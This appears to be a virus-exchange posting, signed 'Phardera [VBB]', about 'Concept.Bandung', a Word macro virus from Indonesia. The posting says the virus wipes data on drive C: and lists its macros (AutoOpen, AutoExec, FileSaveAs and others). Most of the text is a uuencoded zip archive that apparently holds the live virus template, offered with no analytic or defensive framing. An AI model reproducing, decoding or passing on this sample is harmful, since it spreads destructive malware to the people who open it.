Concept.Bandung
A new dangerous macro virus from Bandung, Indonesia.
Published by Phardera [VBB]

I found this virus in Bandung City (Paris van Java). 
I believe this virus modification from Concept.
It is not encrypted virus but will destroy data in drive C:
It contains the macros:
      * AutoOpen
      * AutoExec
      * FileSaveAs
      * FileSaveAs
      * ToolsCustomize
      * ToolsMacro

---------------------------------------------------------------
begin 644 bandung.zip
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
M)````+@```L``````````0`@`````````$)!3D153D<N1$]44$L%!@`````!
-``$`.0```-4D````````
`
end
---------------------------------------------------------------
